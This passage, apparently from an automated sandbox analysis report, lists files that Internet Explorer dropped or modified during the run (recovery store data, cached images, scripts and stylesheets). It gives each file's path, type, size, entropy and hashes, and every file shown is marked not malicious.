                                        Entropy (8bit):4.894078869642119
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{97212EC2-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):548952
                                        Entropy (8bit):2.912295206751126
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{97212EC4-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):364456
                                        Entropy (8bit):3.6287170988625705
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{97212EC6-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27388
                                        Entropy (8bit):1.8496200615655867
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{97212EC8-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27216
                                        Entropy (8bit):1.8581390295123945
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9D2B8B4E-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):16984
                                        Entropy (8bit):1.5754670009647667
                                        Encrypted:false
                                        SSDEEP:48:IwtGcproGwpacG4pQIGrapbSxGQpB2GHHpcAVTGUpG:rzZwQ86WBSLj12AXA
                                        MD5:AB5683FC22D2315C1F43020D2895D880
                                        SHA1:87DFC73F1575C047697623483E0AAB7F5FAE62B6
                                        SHA-256:A4ACF6C0F085C9E0DDFCBDA7E22D483A0085D35B3C15F659AB7996A6A7036225
                                        SHA-512:8655CDD4337C31B5A0EFBC672177C8A6C19474ABA9A3630F64D8183620D548AC5425B3ED3075AC90CA06D6BDA0C41A0BBFF613C48AF3A21593E90328D7056562
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9D2B8B50-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27456
                                        Entropy (8bit):1.8692190494520904
                                        Encrypted:false
                                        SSDEEP:96:r9ZeQm68BSejR2RW+M6KPYDCx2PYDC0qA:r9ZeQm68kejR2RW+M6KQmx2QmdA
                                        MD5:C547AFE53F9D75140BF42C9B8017A4FA
                                        SHA1:DCB4091076C3A35E4EE495CFF4280E71C9C4D5C0
                                        SHA-256:285C45598BB5EB06C8E030F6367AA55F1E24BFDFFD68A99757DE9D3BF87456DF
                                        SHA-512:346BDCF20A63E7E2319634F306E8C60EC3E47F4A4D07225BCF06A6E5ED889C3B54518DE8DA90D9A562DCDC4FE0F9446F3EA538D0EFA2DF6D5F56C7836F1E63A5
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A40F3351-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):16984
                                        Entropy (8bit):1.5730104268086544
                                        Encrypted:false
                                        SSDEEP:48:IwMGcprxGwpaY0G4pQ+mGrapbSktGQpBGGHHpcjTGUpG:rQZrQYE6+oBS0jF29A
                                        MD5:FDA040A48E80BB91E6E03095E6FA99B1
                                        SHA1:322C58A60BDF317CEE5C8CDF775BBEFBD68B779A
                                        SHA-256:BF6A987A4010E3750ADB12F6652D8E5ED20F89AF19C0018324CE66D9177092D6
                                        SHA-512:A319F1B517BFD5F9CA3E171CFCEB0C6A4ADB52788B28B12137C03D2E81B99578BC37E694C9682D5972BEDC2291AAE96A2B03FB2E5971D2FB6F7B019712F482E6
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A40F3353-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27392
                                        Entropy (8bit):1.851425793435613
                                        Encrypted:false
                                        SSDEEP:96:rmZlQR6C0BSkjh21W8M3KEGZ7xqMREGZ7xq0GZJA:rmZlQR6C0kkjh21W8M3KL74MRL74bJA
                                        MD5:39517137A4D08785B85BC823B916EFBA
                                        SHA1:C7C77E6A96F89C12333E0C956EDDF3675BF53AED
                                        SHA-256:9A5CC18009E19F3047058DE44EDF67D6985DE52904A5C877BC8C43B53B67D80C
                                        SHA-512:AAB5D6784262D3C5134B59ADF3C90E9483C2F731E3B6FA4DFDF6F15D9F009296BE01BE6514C5D32C6BFA8C90E61FA511BEE1CA72C9DF969AC43939BDB8116F07
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A40F3355-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):24632
                                        Entropy (8bit):1.7253076886306955
                                        Encrypted:false
                                        SSDEEP:48:IwmGcpr/GwpaDG4pQnGrapbSXGQpBKGHHpckQTGUp8kpGGzYpmklQFGopwWlYYYa:r6ZJQ167BShjR2BW5MByjYr4Dg
                                        MD5:6AB092D3A42B4F044F7C46CB9EC60610
                                        SHA1:68A89971B446E145567C932D48FFCAE52944E672
                                        SHA-256:0C6718229D1A44EFF1366819C57F9BA1CC4C3CCA39203D80F8AAC73F95AECE34
                                        SHA-512:D54D91755A4DB9C311720FB5266F9816617289A6480FFC1D3228B68B4D19C1FCF5D8EAEACFCC6164D3CDA3BE34F267E6B27E0AD8595A2DCD0A6849BA356504D3
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A40F3357-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27384
                                        Entropy (8bit):1.8489960886864234
                                        Encrypted:false
                                        SSDEEP:48:Iw5GcprMGwpanG4pQnGrapbS+GQpBOGHHpcDTGUp8sGzYpmk3Gopw+7+xoVKmQoN:rfZkQJ67BSWjd2dW4M4yGVKXRGVKhxA
                                        MD5:CBB501CB3A3718EEAC50366B0BCD043F
                                        SHA1:19443A5F4B88F87C840B51485AC13F1861E35388
                                        SHA-256:D9778604E6C9A2A78B1C0CD4A870FC0512E874C06F13F7F08B7B8A02BCBDEE3D
                                        SHA-512:B4B633DDE5A02CDF04D55AD82642424122D64F489E0DB57BEE3079C3DEEFDA8E702BDF7B3456F419216B02993B59B63AD92281914808C40DA21FBF1B957448AF
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A67-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):16984
                                        Entropy (8bit):1.5693511883858517
                                        Encrypted:false
                                        SSDEEP:48:IwPGcpriGwpa2G4pQWGrapbS6GQpBqGHHpczTGUpG:rFZKQG6YBSCjx2NA
                                        MD5:8BC960261C70FC42240DDA8DA39B3AA2
                                        SHA1:4936AE23EDB269DDACDDF401A2F3795AA1039194
                                        SHA-256:9757CA569D046D6CBFC001B254CB21375DE24A5C460ECA81AFFA3025312D3E7E
                                        SHA-512:AACC0068F076AA4BCCB2A0BE9D874B7841A4B3FE436FEE848F9B14E4612FB6265E6EDBB2A8ED4EA13A0796AA770E61CD4BB93DD5844EB3A12993F447FA7262C6
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A69-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27444
                                        Entropy (8bit):1.8669764177537533
                                        Encrypted:false
                                        SSDEEP:96:rrZ8QM62BSWj92tWiM6W33VyNOx33Vyn3QNA:rrZ8QM62kWj92tWiM6W3FSOx3FUgNA
                                        MD5:F6C26927851D3856A2C32670DEC831B3
                                        SHA1:A5C17925E630BFA922EEDAA3703C0962F3DDC762
                                        SHA-256:68AAC5753A75797B2F7E2AA65770F0762235C07077DB66A7FA3D735402DC280D
                                        SHA-512:7EDAFA1486345846AE1D20CEFAB207B6CDD62F9C3C135F306F3ECA7C2F0CD25D69A68C360948C683237A750084171465252D6A5BCE2BB55E066FB0A178013D01
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A6A-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):19032
                                        Entropy (8bit):1.5832873970840036
                                        Encrypted:false
                                        SSDEEP:48:IwPGcpryGwpaXG4pQXGrapbSwGQpKKG7HpRETGIpX20GApm:rFZ6QZ6rBS4AlTAFrg
                                        MD5:406105571938AF78DA4A542934F2C0AF
                                        SHA1:5727254801FC20C634B0D596F04ED544886E8DAA
                                        SHA-256:9A39162B37C0F38F5BF62633FB3FB213475EE322E9889DD95E203D354AAE9A9A
                                        SHA-512:AC8B7792579D5B66C745C17E67015CF55ABD7D4D34276770E1740C03A9EB10F094E325C39A4C5601695F6611CD1C510C01A3A090362E56CD201B548BBD92ADCE
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A6C-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):16984
                                        Entropy (8bit):1.5739616130679477
                                        Encrypted:false
                                        SSDEEP:48:Iw5GcprQGwpaR7G4pQpGrapbSwGQpBllGHHpcl8TGUpG:rfZ4QRd6JBS4jlo2l0A
                                        MD5:D099F77A8677C3ACD4CDD89445CD0EDE
                                        SHA1:096990181ED6C83828CF3FA51B80EACEDAA4C16B
                                        SHA-256:A5C041364AFE6D0C183EA33FEF931A1D2961F949943801D107CCDFF49356C5E2
                                        SHA-512:D6B1CBAB05444222D510B319F40993DAC022EFD5D7848C2AB4652195FC8ED6581B3DDBAFC7006492BC6E26AE003959BAE0E07F2A2264BC1CB09EE5D188FFCB83
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ABDA8A6E-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27392
                                        Entropy (8bit):1.8481283944195614
                                        Encrypted:false
                                        SSDEEP:96:rHZYQI6yBSPjg20WOMiKY+hfrPRY+hfrLA:rHZYQI6ykPjg20WOMiKDPRDLA
                                        MD5:48222DFE446ACED9840C42872B680857
                                        SHA1:015CF243725862E13E8E2797D4D348058597C933
                                        SHA-256:B80C378D6F9333E67FDEB3E35571014FD7A8AF7DB5ED50B362732ABC2B5FB2EB
                                        SHA-512:777144B8CA1926189BB576B60EA4C07BEAB2FC62E4F3B2D0FAFFE39B0A6F004F32EAD83C63D6E34D353C677601E98DEFFA781FD188DDB708A10B10FA202E16DF
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B2D93678-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27216
                                        Entropy (8bit):1.8566710772880282
                                        Encrypted:false
                                        SSDEEP:192:r6ZNQh6rkojF2zWoMca2i7UAYx2mi7U3A:rmS8wq8KNbbgE
                                        MD5:648989DA779F40589B6523C3835EEDAD
                                        SHA1:010C1188F513CA8AB5C7BEFF92F3B8DE5233754D
                                        SHA-256:51E4D5507F5F1B7AB482DC5A6B3658200E3C413FD1C8C008E1501253B786C518
                                        SHA-512:13AA62DD620D8B8B7F89185D85EE05BACBB19FC985B6459C561AA4514A115E0674DCD30493668FF17AA2E3C09C23CE94C65A3E812716236032FC5F3A56CC5224
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B2D9367B-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27404
                                        Entropy (8bit):1.8572823639685336
                                        Encrypted:false
                                        SSDEEP:192:rTZUQA6CkXjx2HWuMie+LObtv8x+LObt0pA:rVdr7Tg2HtfFEfj
                                        MD5:DDB7C72B2B1C8B2B5071F7A5565D896D
                                        SHA1:508C00D7367AA3A67D677F5E32314A1E1C047709
                                        SHA-256:57DA8C2AA237F6FD25BADDBD27E96E72925C97F6ED0BA7EA0A658EB6769F1649
                                        SHA-512:80DBBA7480D83EB8F6A1F16969E3645236BAF5348901D02EC54AE4EB96A11BC55ABDE6F0C12032795B4A3F951F3ED67CBE3CEED0A279DBCFB42CDA150CF3BBB3
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B2D9367C-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):19032
                                        Entropy (8bit):1.5983526464503603
                                        Encrypted:false
                                        SSDEEP:48:IwrGcprqGwpaoG4pQoGrapbSrGQpBaGHHpcsTGUpQKNGcpm:rxZyQ462BSFjh2k6Ug
                                        MD5:CC0FE0FF58AE555D6656C15E677D54C0
                                        SHA1:6E384C2313C2830C32F8BAAADE358BC9B62206B5
                                        SHA-256:4DA66904C9D7605A78AF2DE03AD5EB4CAF7ECA60B973BBA03DDB5D0B8EFCB8D0
                                        SHA-512:A96DBEC54CBFFF31E69F5B6D6B6B73E33F0A6B35C67899B2BC84C174A46E9293F80C9A2040F8CB67BA90AB36C0C139C841BAB5FD4DFB1AD57736D2281E0EE3D6
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B2D9367E-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):19032
                                        Entropy (8bit):1.5986649966212345
                                        Encrypted:false
                                        SSDEEP:48:IwIGcprRGwpa2G4pQSGrapbSkGQpBxoGHHpc7TGUpQI9Gcpm:r8ZLQG6UBS8j52V6qg
                                        MD5:9F4A3AF3995F42AAEAE382092E9311D2
                                        SHA1:AA667B30303BC530E2F2E6DA9A54E25E3BF442D8
                                        SHA-256:1812AE11D447451E6756B21B57C16D5F0AEFD3B8B4A31A3F933B127F4E352B77
                                        SHA-512:100FB524336AD4F58E95B55185632A38358AA4BBE553BDFDC18EA2804DEC3DE346A3B7F8BE8712DE73EABA1240894FF9DA93B7031009F4156C10BAEA5DCFBB1E
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C376A120-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):19032
                                        Entropy (8bit):1.5994990011009769
                                        Encrypted:false
                                        SSDEEP:48:Iw2GcprDGwpafG4pQHGrapbSSGQpBKGHHpcPTGUpQLXGcpm:rqZdQx6bBS6jR2Z65g
                                        MD5:1F421F839BBF29CAEFEE5CBEC2E5196A
                                        SHA1:F97343BE05CA4E4A0241221D420511DB28E18DBD
                                        SHA-256:85E11E77FF763117461C7884C2C09C121FBCF19DFF1B1236300E3C48843D751E
                                        SHA-512:A30EFEB5EFF6492078C0C9489F4DA999003BA807DFF39DC5BE133319928B855AF26D7D3E7561796F246AC90BAAEA74187AAAEF1EB8C052A12EF1051A8B00A2E3
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C376A122-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27928
                                        Entropy (8bit):1.845594841204007
                                        Encrypted:false
                                        SSDEEP:96:r0ZHQv69BSpjh21WFMZS0+GGyvR0+GGy5+XJr:r0ZHQv69kpjh21WFMZSRGzvRRGzsZr
                                        MD5:4651C2F105BCCBA8410CE678679F1B0D
                                        SHA1:A6CF948D4AC230B4EF320ABCB3BC80F0959A0B1A
                                        SHA-256:1EEE98F97BCA82DB7694D56E342A43680F97A699B6E3C8DE59B6EFD9CC8A5BDB
                                        SHA-512:48BDA631B7E1ACB622A31E844864700BEFA88718845AE950F135E41B288E25D92DBAFF52F1FB7DC1B42D2B033BE9F73FA2395188D07A3803CB97A15EB6F0E8CE
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D67A7CCD-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:modified
                                        Size (bytes):16984
                                        Entropy (8bit):1.5741886878119258
                                        Encrypted:false
                                        SSDEEP:48:IwFGcprEGwpaoG4pQMGrapbSrGQpBOGHHpcDTGUpG:rbZ8Q46KBSFjd2dA
                                        MD5:C37E7E25B5720A5BDE17831E9AE077DF
                                        SHA1:F9AFB370E0CD3876D93D541855A406B540BA67AF
                                        SHA-256:155A43009544CA7CBFC5BFF24D3B91B868CA3A350DE2C8B81901C83316C28454
                                        SHA-512:D265763710D03140A4F88CABA34E17047FDB0DDC07025EAC2F60B92C1557B468CDC8B93B7F29FF94994516D6154FE862DA566A40203692B7ADFD88A093B87E70
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):934
                                        Entropy (8bit):7.017170527854778
                                        Encrypted:false
                                        SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upG7On:u6tWu/6symC+PTCq5TcBUX4blOn
                                        MD5:DF8CCBBD66B03F497CEFE9D8F8A7F52F
                                        SHA1:482F587B4EB67EEDB562BF16DC9625F4506574F1
                                        SHA-256:2B9F8426386CB2AD99329C4A2291D6F4E225718FA1E4A03E9DB3C69FE8E6B320
                                        SHA-512:6496B7A39F5B2E8692853471418549036F9D73654AE31CFAED9F1C146E80DF93ED9A4E1B7504B8402701FA861831DB424C42BFADD59DA05CC32CF8E432D0C4C2
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\17-361657-68ddb2ab[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):1238
                                        Entropy (8bit):5.066474690445609
                                        Encrypted:false
                                        SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                        MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                        SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                        SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                        SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\264bf325-c7e4-4939-8912-2424a7abe532[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                        Category:dropped
                                        Size (bytes):58885
                                        Entropy (8bit):7.966441610974613
                                        Encrypted:false
                                        SSDEEP:1536:Hj/aV3ggpq9UKGo7EVbG4+FVWC2eXNA6qQYKIp/uzL:Di3gyq9Ue7EVsCjeXuS
                                        MD5:FFA41B1A288BD24A7FC4F5C52C577099
                                        SHA1:E1FD1B79CCCD8631949357439834F331043CDD28
                                        SHA-256:AA29FA56717EA9922C3D85AB4324B6F58502C4CF649C850B1EC432E8E2DB955F
                                        SHA-512:64750B574FFA44C5FD0456D9A32DD1EF1074BA85D380FD996F2CA45FA2CE48D102961A34682B07BA3B4055690BB3622894F0E170BF2CC727FFCD19DECA7CCBBD
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\2d-0e97d4-185735b[1].css
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):251398
                                        Entropy (8bit):5.2940351809352855
                                        Encrypted:false
                                        SSDEEP:3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
                                        MD5:24D71CC2CC17F9E0F7167D724347DBA4
                                        SHA1:4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
                                        SHA-256:4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
                                        SHA-512:43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\52-478955-68ddb2ab[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):396665
                                        Entropy (8bit):5.323973786488522
                                        Encrypted:false
                                        SSDEEP:6144:YXP9M/wSg/jgyYZw44KfhmnidDWPqIjHSjalCr1BgxO0DkV4FcjtIuNK:CW/VonidDWPqIjHdg16tbcjut
                                        MD5:EBE291FBFB5808D09F5B5BE3D0A5A25E
                                        SHA1:7DAE03E3E55EEE92453095B5A4AE26A4F492AA6E
                                        SHA-256:FC248BEFAA53648F714231D548349AF87DBB3F2C283586BF441B0DF7E2A98E76
                                        SHA-512:8F069F360A2607B906D20A62A3EE04D9A19077812713A9CD6A4C79EC1EAEAAF04412A27F616D1C857D92F858039155A251E1CD09F8992457288383998C460C5B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAKp8YX[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):497
                                        Entropy (8bit):7.3622228747283405
                                        Encrypted:false
                                        SSDEEP:12:6v/7YBQ24PosfCOy6itR+xmWHsdAmbDw/9uTomxQK:rBQ24LqOyJtR+xTHs+jUx9
                                        MD5:CD651A0EDF20BE87F85DB1216A6D96E5
                                        SHA1:A8C281820E066796DA45E78CE43C5DD17802869C
                                        SHA-256:F1C5921D7FF944FB34B4864249A32142F97C29F181E068A919C4D67D89B90475
                                        SHA-512:9E9400B2475A7BA32D538912C11A658C27E3105D40E0DE023CA8046656BD62DDB7435F8CB667F453248ADDCB237DAEAA94F99CA2D44C35F8BB085F3E005929BD
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAMqFmF[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):553
                                        Entropy (8bit):7.46876473352088
                                        Encrypted:false
                                        SSDEEP:12:6v/7kFXASpDCVwSb5I63cth5gCsKXLS39hWf98i67JK:PFXkV3lBKbSt8MVK
                                        MD5:DE563FA7F44557BF8AC02F9768813940
                                        SHA1:FE7DE6F67BFE9AA29185576095B9153346559B43
                                        SHA-256:B9465D67666C6BAB5261BB57AE4FC52ED6C88E52D923210372A9692A928BDDE2
                                        SHA-512:B74308C36987A45BC96E80E7C68AB935A3CC51CD3C9B4D0A8A784342B268715A937445DEB3AEF4CA5723FBC215B1CAD4E7BC7294EECEC04A2F1786EDE73E19A7
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AANT3y4[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:modified
                                        Size (bytes):28887
                                        Entropy (8bit):7.909497836335464
                                        Encrypted:false
                                        SSDEEP:768:IgaJ65BYqO+B1DOZFA3oZgD3iE+8wdlirV:IzoaqdOZ9grK8wdsrV
                                        MD5:CF05D5EA1D6AF4CABD89F2A00C0E8AD2
                                        SHA1:D9FB635C8CF27B6655B5A585F0F76D801B6E6423
                                        SHA-256:4F83E4BD355BDF6CC520A7868DA0DCB6EFCA840B20E5CAA51FC5F5F227EAE4BC
                                        SHA-512:D00256BF16B34B2962275187E5210450CFDC57C795CA8E0BBF06EDDA4BC4CCBB1589CFBBE8537B76F96FE9CEE84ED856C617E7AF787B698254F12BA70AF6068D
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AANg50h[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):40569
                                        Entropy (8bit):7.954892481469937
                                        Encrypted:false
                                        SSDEEP:768:ILhyA//Akly9981n74czNrDrLjXGik/48pcO0JPX3SEebK:IEmAkQ81Ug73UfefSEj
                                        MD5:B0989E31EDD523B96803E1AF9153AA0C
                                        SHA1:F0E256D8E5C95FF66618EAE588B074E4E5BAF831
                                        SHA-256:2F64ACD4B6DDBC2291738375B81AF48DFE287A731ECDF5AF977DFC53E3EB763A
                                        SHA-512:06A87F74E757AE2A341CB37AD6C9BD5351964B951D460FB52F25E44329B6283AFB456639E731A504EFD2BF49A2B4FD0691FF04FBA3C00E8AC031A7795992A3FC
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AANg9R8[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):27866
                                        Entropy (8bit):7.9012317290639515
                                        Encrypted:false
                                        SSDEEP:768:I2Zq3LwC9rPFs42M/6+qsP2BvpTRohxC9HW9M0dAqT:I80drPhR6HuvAqT
                                        MD5:22A765E78393D6675377E20F60E382DE
                                        SHA1:94F6AF29EA57274BFEEE6CCD41EDDB14F0583F24
                                        SHA-256:E621E02B6BB36B9FE5FD1F2E47D08EBCC8BAC15275F3F70569FBC7E116E6F342
                                        SHA-512:B2AAC7B7BC88BEE4BEC9D6EFFC252924B3E7D923C5B9E2FECB90260F29A48BE9A7A16CF04FF0926461CA98AE2E69C116D138335C228A863EB0D8C27F98D02C83
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOfZRW[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
